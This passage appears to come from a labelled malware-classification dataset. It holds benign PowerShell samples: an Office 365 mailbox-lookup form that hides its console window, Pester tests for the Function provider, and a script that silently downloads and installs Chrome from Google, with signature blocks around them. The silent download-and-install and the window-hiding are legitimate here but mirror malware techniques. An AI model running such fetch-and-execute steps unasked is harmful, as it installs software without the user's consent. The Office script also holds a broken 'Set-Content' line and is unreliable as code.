// jhkWi3GlWxk33JiNbzESdbczMAjSKAqv78vFh/EHVdQf // SIG // wG+bCvkPciL8xsOO031zxPEZa2rsCv3vp1p8DLdOtGpB // SIG // GYiSc9VYdS4UmCmoj/WdtxGZhhEwlooJCm3LgJ4b4d8q // SIG // zGvPbgX2nh0GRBxkKnbJDOPBAXFklnaYkkgYgMcoR1JG // SIG // 5J5fTz87Qf0lMc0WY1M1h4PW39ZqmdHCIgFgtBIyuzjY // SIG // ZUHykkR1SyizT6Zd//lC+F43NGL3anPPIDi1K//OE/f8 // SIG // Sua/Nrpb0adgPP2q/XBuFu+udLimgMUQJoC+ISoCF+f9 // SIG // GiALG8qiTmujiBkhfWvg315dS6UDzSke/drHBe7Yw+Vq // SIG // sCLon0vWFIhzL0S44ypNEkglf5qVwtAaD5JOWrH8a6yW // SIG // wrCXjx0jhG5aSc0Zs2j+jjF8EXK2+01xUDrE5CrqpFr7 // SIG // 2CD71cwuvFDPjLJCz5XdXqnTjjCu0m239rRkmX9/ojsF // SIG // kDHFlwfYMOYCtwCGCtPFpCSbssz6n4rYLm3UQpmK/Qlb // SIG // DTrlvsBw2BoXIiQxdi5K45BVI1HF0iCXfX9rLGIrWfQr // SIG // qxle+AUHH68Y75NS/I77Te5rpSMCAwEAAaOCAUkwggFF // SIG // MB0GA1UdDgQWBBTP/uCYgJ82OHaRH/2Za4dSu96PWDAf // SIG // BgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf // SIG // BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv // SIG // c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBU // SIG // aW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmwwbAYI // SIG // KwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8v // SIG // d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01p // SIG // Y3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEw // SIG // KDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQM // SIG // MAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkq // SIG // hkiG9w0BAQsFAAOCAgEAdKHw25PpZVotXAup7H4nuSba // SIG // dPaOm+gEQqb7Qz6tihT/oYvlDTT+yxnIirnJKlwpgUxS // SIG // IXwXhksb5OsnKJHUK9/NeaRDmmFk5x70NPvISsvOq9Re // SIG // K3wbuKBweXE8tPE+KIaxvzmBvwf4DZ89Dper+7v6hI8+ // SIG // PM12emZcShsmcCpimVmgXdg2BMMyqXS5AcbOgOnp1mUd // SIG // I2PquRXW1eOYIRkyoEq+RAgDpyw+J4ycH4yKtJkWVsA2 // SIG // UKF7SUmlR0rtpR0C92BxBYpLp21EyXzXwQyy+xr/rE5k // SIG // Yg2ZMuTgMaCxtoGk37ohW36Zknz3IJeQjlM3zEJ86Sn1 // SIG // +vhZCNEEDb7j6VrA1PLEfrp4tlZg6O65qia6JuIoYFTX // SIG // S2jHzVKrwS+WYkitc5mhCwSfWvmDoxOaZkmq1ubBm5+4 // SIG // lZBdlvSUCDh+rRlixSUuR7N+s2oZKB4fIg/ety3ho2ap // SIG // BbrCmlFu9sjI/8sU3hhAzqCK9+ZMF8a9VLvs5Lq9svhb // SIG // jWNKGY6ac6feQFtZXoT9MWjvqAVdV372grq/weT1QKds // SIG // c66LDBFHAMKSaYqPlWHyLnxo+5nl3BkGFgPFJq/CugLq // SIG // PiZY/CHhUupUryoakKZnQcwDBqjzkCrdTsN2V8XoSu7w // SIG // Iopt2YgC5TNCueOpNLGa8XWT4KZs+zvMPYBy7smQEHsw // SIG // ggdxMIIFWaADAgECAhMzAAAAFcXna54Cm0mZAAAAAAAV // SIG // MA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzET // SIG // MBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk // SIG // bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0 // SIG // aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0 // SIG // aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAx // SIG // ODIyMjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYT // SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH // SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y // SIG // cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1l // SIG // LVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0BAQEF // SIG // AAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7V // SIG // gtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/H // SIG // ZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY6GB9alKD // SIG // RLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gm // SIG // U3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36M // SIG // EBydUv626GIl3GoPz130/o5Tz9bshVZN7928jaTjkY+y // SIG // OSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoF // SIG // VZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJi // SIG // ss254o2I5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGa // SIG // RnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+Autuqfjbs // SIG // Nkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afo // SIG // mXw/TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9 // SIG // ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk // SIG // i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y // SIG // 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV // SIG // 2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3PmriLq0C // SIG // AwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEw // SIG // IwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/ // SIG // LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJlpxtTNRnp // SIG // cjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8G // SIG // CCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j // SIG // b20vcGtpb3BzL0RvY3MvUmVwb3NpdG9yeS5odG0wEwYD // SIG // VR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAwe // SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB // SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9 // SIG // lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDov // SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj // SIG // dHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoG // SIG // CCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov // SIG // L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS // SIG // b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcN // SIG // AQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/ypb+pc // SIG // FLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHk // SIG // wo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AF // SIG // vonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM9W0jVOR4 // SIG // U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2 // SIG // EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8Atq // SIG // gcKBGUIZUnWKNsIdw2FzLixre24/LAl4FOmRsqlb30mj // SIG // dAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZM // SIG // cm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQE // SIG // cb9k+SS+c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2f // SIG // pCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBM // SIG // drVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L // SIG // +DvktxW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJ // SIG // C4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU // SIG // 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ // SIG // 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDUDCC // SIG // AjgCAQEwgfmhgdGkgc4wgcsxCzAJBgNVBAYTAlVTMRMw // SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt // SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp // SIG // b24xJTAjBgNVBAsTHE1pY3Jvc29mdCBBbWVyaWNhIE9w // SIG // ZXJhdGlvbnMxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT // SIG // Tjo5MjAwLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z // SIG // b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsO // SIG // AwIaAxUAs3IE5xmrEsHv3a7vnD3tTRf78EOggYMwgYCk // SIG // fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu // SIG // Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV // SIG // TWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N // SIG // aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkq // SIG // hkiG9w0BAQsFAAIFAOmLmwEwIhgPMjAyNDAzMDEwMDA4 // SIG // MzNaGA8yMDI0MDMwMjAwMDgzM1owdzA9BgorBgEEAYRZ // SIG // CgQBMS8wLTAKAgUA6YubAQIBADAKAgEAAgIQZwIB/zAH // SIG // AgEAAgIYwzAKAgUA6YzsgQIBADA2BgorBgEEAYRZCgQC // SIG // MSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQow // SIG // CAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQATCThn // SIG // X4oMWOP9LKZzNIDD2hzWYh3kjUbZxKInC839OLtIw+RY // SIG // T7KBvFO7ZOhBT0nZwU4b7girHHXKGR5BEt43hfQUgevO // SIG // xVydtnQWwsfFn/qJtfU8CKV0fu8rmP7PD6yCXRxYWDMa // SIG // +tvjdhu7cwQAzlqrSJncR7TWjujeIusog3QbEdvRAcJm // SIG // ShsiStBrbFClv3QIhL9nqrQv8RmzZ3/yzq0JaK+D5Ow9 // SIG // 6wTfwv+1P5UZq26OswYuJ5CbG38mgVnwsXVHvgtIFcYV // SIG // ZY72U12XAEpxjLZg1Q9iL6AvO9l8wue9v+xNQImiKI6G // SIG // sy70z6ecEKTIpmkzeg8ANt/7hGX0MYIEDTCCBAkCAQEw // SIG // gZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp // SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT // SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd // SIG // TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA // SIG // AAHnLo8vkwtPG+kAAQAAAecwDQYJYIZIAWUDBAIBBQCg // SIG // ggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAv // SIG // BgkqhkiG9w0BCQQxIgQgQXJrlCgX6GHyJ0GlgmmePQXN // SIG // rZjIf5jIkhmmYrvu8d8wgfoGCyqGSIb3DQEJEAIvMYHq // SIG // MIHnMIHkMIG9BCDlNl0NdmqG/Q3gxVzPVBR3hF++Bb9A // SIG // Ab0DBu6gudZzrTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVT // SIG // MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS // SIG // ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y // SIG // YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0 // SIG // YW1wIFBDQSAyMDEwAhMzAAAB5y6PL5MLTxvpAAEAAAHn // SIG // MCIEIJDDRTU5oL7vqsuxWrkltnW3y7pwUCi0DPrRPa9p // SIG // Y12UMA0GCSqGSIb3DQEBCwUABIICAJTKH9eTgl2XIdVc // SIG // /G3E6IgP5lv608vDEfObzQNNcaK+ok74Ivct3E3jrGLu // SIG // DZcWBERtKaA/2+/sKJEuNAN4fk41T/M2rj0isoaihbjU // SIG // /p+Pj4Hpy6GmzApZFnw6XDB7s44xbuXILksH4bazqtwx // SIG // IVKb4D9wZVaLLiGwKeo+euOd3POR06P5nI4TaCPuzBYN // SIG // LA5/k1waEpQM6WWXSf1TGZBLZUC7DvbLZFGLP/OBMf7Y // SIG // Ry75emq/UTmNkPQOFLlLBnhxv1D7578IOjt0CdVYGMZM // SIG // lEqoMe1/6Pur3T9kv+NlXZRdbUQtDYSXEG4hs1HpQxER // SIG // kalnV72ec0eF4HuNqMqdbBVTBXkquto07kbMa2NlUG0P // SIG // 2vxRuXthxYd1bmErf15o7tl8Uuogkws9BOL/11X+8tjx // SIG // sbLZBTOc4hu5jO3VMZtS/eGe/3JOVnux3pm2V1bTuJNY // SIG // 6a9SEaazP1tO+ft67NFDC7fHojXwqIDaiI9jIYwM6wMx // SIG // rnYdZVqDkDXyCvIoctmoE0Y2kzgKPRNSFc6+j/L+iV3V // SIG // JBXXUN7RUrB60fkjRkbq4FfTpgizYguwT36Wgr5v5wau // SIG // U0Ywg1ma669WI0/90he2Yenj30isZ+daRZuTJLfI8H9B // SIG // v7NtBkAPINc5yrc4GUJnY41tuQRMSjOxMDG8aVzsRFTR // SIG // ZF3+RH8Z // SIG // End signature block
combined_dataset/train/non-malicious/Office 365 - get email .ps1
Office 365 - get email .ps1
$Content = '$script:showWindowAsync = Add-Type –memberDefinition @”','[DllImport("user32.dll")]','public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);','“@ -name “Win32ShowWindowAsync” -namespace Win32Functions –passThru','function Show-PowerShell() {','$null = $showWindowAsync::ShowWindowAsync((Get-Process –id $pid).MainWindowHandle, 10)','}','function Hide-PowerShell() {','$null = $showWindowAsync::ShowWindowAsync((Get-Process –id $pid).MainWindowHandle, 2)','}' Set-Content $Content -Path C:\\ Add-Module PowerShell Hide-PowerShell Import-Module ActiveDirectory Import-Module MSOnline $cred = Get-Credential Connect-MsolService -Credential $cred $session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell/ -Credential $Cred -Authentication Basic -AllowRedirection Import-PSSession $session [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing") [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") $objForm = New-Object System.Windows.Forms.Form $objForm.Text = "Check Email address in Office365" $objForm.Size = New-Object System.Drawing.Size(300,200) $objForm.StartPosition = "CenterScreen" $objForm.KeyPreview = $True $objForm.Add_KeyDown({if ($_.KeyCode -eq "Enter") {$x=$objTextBox.Text;$objForm.Close()}}) $objForm.Add_KeyDown({if ($_.KeyCode -eq "Escape") {$objForm.Close()}}) $OKButton = New-Object System.Windows.Forms.Button $OKButton.Location = New-Object System.Drawing.Size(75,120) $OKButton.Size = New-Object System.Drawing.Size(75,23) $OKButton.Text = "OK" $OKButton.Add_Click({$x=$objTextBox.Text;$objForm.Close()}) $objForm.Controls.Add($OKButton) $CancelButton = New-Object System.Windows.Forms.Button $CancelButton.Location = New-Object System.Drawing.Size(150,120) $CancelButton.Size = New-Object System.Drawing.Size(75,23) $CancelButton.Text = "Cancel" $CancelButton.Add_Click({$objForm.Close()}) $objForm.Controls.Add($CancelButton) $objLabel = New-Object System.Windows.Forms.Label $objLabel.Location = New-Object System.Drawing.Size(10,20) $objLabel.Size = New-Object System.Drawing.Size(280,20) $objLabel.Text = "Please enter the email address below:" $objForm.Controls.Add($objLabel) $objTextBox = New-Object System.Windows.Forms.TextBox $objTextBox.Location = New-Object System.Drawing.Size(10,40) $objTextBox.Size = New-Object System.Drawing.Size(260,20) $objForm.Controls.Add($objTextBox) $objForm.Topmost = $True $objForm.Add_Shown({$objForm.Activate()}) [void] $objForm.ShowDialog() $x $EmailAddress = 'smtp:' + $x $Answer = Get-Mailbox | Where-Object {$_.EmailAddresses -eq $EmailAddress} | Select-Object 'Name' $objForm2 = New-Object System.Windows.Forms.Form $objForm2.Text = "The Email address is asigned to account:" $objForm2.Size = New-Object System.Drawing.Size(300,200) $objForm2.StartPosition = "CenterScreen" $objLabel2 = New-Object System.Windows.Forms.Label $objLabel2.Location = New-Object System.Drawing.Size(10,20) $objLabel2.Size = New-Object System.Drawing.Size(280,20) $objLabel2.Text = $Answer $objForm2.Controls.Add($objLabel2) $OKButton2 = New-Object System.Windows.Forms.Button $OKButton2.Location = New-Object System.Drawing.Size(75,120) $OKButton2.Size = New-Object System.Drawing.Size(75,23) $OKButton2.Text = "OK" $OKButton2.Add_Click({$objForm2.Close()}) $objForm2.Controls.Add($OKButton2) $objForm2.Add_Shown({$objForm2.Activate()}) [void] $objForm2.ShowDialog() $sessionName = Get-PSSession | Select-Object 'Name' Remove-PSSession -Name $sessionName
combined_dataset/train/non-malicious/1795.ps1
1795.ps1
Describe "Basic Function Provider Tests" -Tags "CI" { BeforeAll { $existingFunction = "existingFunction" $nonExistingFunction = "nonExistingFunction" $text = "Hello World!" $functionValue = { return $text } $restoreLocation = Get-Location $newName = "renamedFunction" Set-Location Function: } AfterAll { Set-Location -Path $restoreLocation } BeforeEach { Set-Item $existingFunction -Options "None" -Value $functionValue } AfterEach { Remove-Item $existingFunction -ErrorAction SilentlyContinue -Force Remove-Item $nonExistingFunction -ErrorAction SilentlyContinue -Force Remove-Item $newName -ErrorAction SilentlyContinue -Force } Context "Validate Set-Item Cmdlet" { It "Sets the new options in existing function" { $newOptions = "ReadOnly, AllScope" (Get-Item $existingFunction).Options | Should -BeExactly "None" Set-Item $existingFunction -Options $newOptions (Get-Item $existingFunction).Options | Should -BeExactly $newOptions } It "Sets the options and a value of type ScriptBlock for a new function" { $options = "ReadOnly" Set-Item $nonExistingFunction -Options $options -Value $functionValue $getItemResult = Get-Item $nonExistingFunction $getItemResult.Options | Should -BeExactly $options $getItemResult.ScriptBlock | Should -BeExactly $functionValue } It "Removes existing function if Set-Item has no arguments beside function name" { Set-Item $existingFunction $existingFunction | Should -Not -Exist } It "Sets a value of type FunctionInfo for a new function" { Set-Item $nonExistingFunction -Value (Get-Item $existingFunction) Invoke-Expression $nonExistingFunction | Should -BeExactly $text } It "Sets a value of type String for a new function" { Set-Item $nonExistingFunction -Value "return '$text' " Invoke-Expression $nonExistingFunction | Should -BeExactly $text } It "Throws PSArgumentException when Set-Item is called with incorrect function value" { { Set-Item $nonExistingFunction -Value 123 -ErrorAction Stop } | Should -Throw -ErrorId "Argument,Microsoft.PowerShell.Commands.SetItemCommand" } } Context "Validate Get-Item Cmdlet" { It "Gets existing functions by name" { $getItemResult = Get-Item $existingFunction $getItemResult.Name | Should -BeExactly $existingFunction $getItemResult.Options | Should -BeExactly "None" $getItemResult.ScriptBlock | Should -BeExactly $functionValue } It "Matches regex with stars to the function names" { $getItemResult = Get-Item "ex*on" $getItemResult.Name | Should -BeExactly $existingFunction $getItemResult = Get-Item "*existingFunction*" $getItemResult.Name | Should -BeExactly $existingFunction Set-Item $nonExistingFunction -Value $functionValue $getItemResults = Get-Item "*Function" $getItemResults.Count | Should -BeGreaterThan 1 } } Context "Validate Remove-Item Cmdlet" { It "Removes function" { Remove-Item $existingFunction { Get-Item $existingFunction -ErrorAction Stop } | Should -Throw -ErrorId "PathNotFound,Microsoft.PowerShell.Commands.GetItemCommand" } It "Fails to remove not existing function" { { Remove-Item $nonExistingFunction -ErrorAction Stop } | Should -Throw -ErrorId "PathNotFound,Microsoft.PowerShell.Commands.RemoveItemCommand" } } Context "Validate Rename-Item Cmdlet" { It "Renames existing function with None options" { Rename-Item $existingFunction -NewName $newName { Get-Item $existingFunction -ErrorAction Stop } | Should -Throw -ErrorId "PathNotFound,Microsoft.PowerShell.Commands.GetItemCommand" (Get-Item $newName).Count | Should -BeExactly 1 } It "Fails to rename not existing function" { { Rename-Item $nonExistingFunction -NewName $newName -ErrorAction Stop } | Should -Throw -ErrorId "PathNotFound,Microsoft.PowerShell.Commands.RenameItemCommand" } It "Fails to rename function which is Constant" { Set-Item $nonExistingFunction -Options "Constant" -Value $functionValue { Rename-Item $nonExistingFunction -NewName $newName -ErrorAction Stop } | Should -Throw -ErrorId "CannotRenameFunction,Microsoft.PowerShell.Commands.RenameItemCommand" } It "Fails to rename function which is ReadOnly" { Set-Item $nonExistingFunction -Options "ReadOnly" -Value $functionValue { Rename-Item $nonExistingFunction -NewName $newName -ErrorAction Stop } | Should -Throw -ErrorId "CannotRenameFunction,Microsoft.PowerShell.Commands.RenameItemCommand" } It "Renames ReadOnly function when -Force parameter is on" { Set-Item $nonExistingFunction -Options "ReadOnly" -Value $functionValue Rename-Item $nonExistingFunction -NewName $newName -Force { Get-Item $nonExistingFunction -ErrorAction Stop } | Should -Throw -ErrorId "PathNotFound,Microsoft.PowerShell.Commands.GetItemCommand" (Get-Item $newName).Count | Should -BeExactly 1 } } }
combined_dataset/train/non-malicious/sample_57_38.ps1
sample_57_38.ps1
$url = 'https://dl.google.com/tag/s/dl/chrome/install/googlechromestandaloneenterprise.msi'; if ([Environment]::Is64BitProcess) { $url = 'https://dl.google.com/tag/s/dl/chrome/install/googlechromestandaloneenterprise64.msi' } $wc = New-Object net.webclient $msiInstaller = "$env:temp\google-chrome.msi" Write-Host "Downloading Google Chrome" $wc.Downloadfile($url, $msiInstaller) Write-Host "Installing Google Chrome" $arguments = "/i `"$msiInstaller`" /quiet" Start-Process msiexec.exe -ArgumentList $arguments -Wait Remove-Item $msiInstaller $suffix = "\\Google\\Chrome\\Application\\chrome.exe" if (Test-Path "${env:ProgramFiles(x86)}$suffix") { (Get-Item "${env:ProgramFiles(x86)}$suffix").VersionInfo } elseif (Test-Path "${env:ProgramFiles}$suffix") { (Get-Item "${env:ProgramFiles}$suffix").VersionInfo } else { write-host "ERROR: failed to install Google Chrome" exit 1 } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCApHGIDy0iPxLxp # YspqTScUjuZcphWTWoewNYY4w1ywAKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # 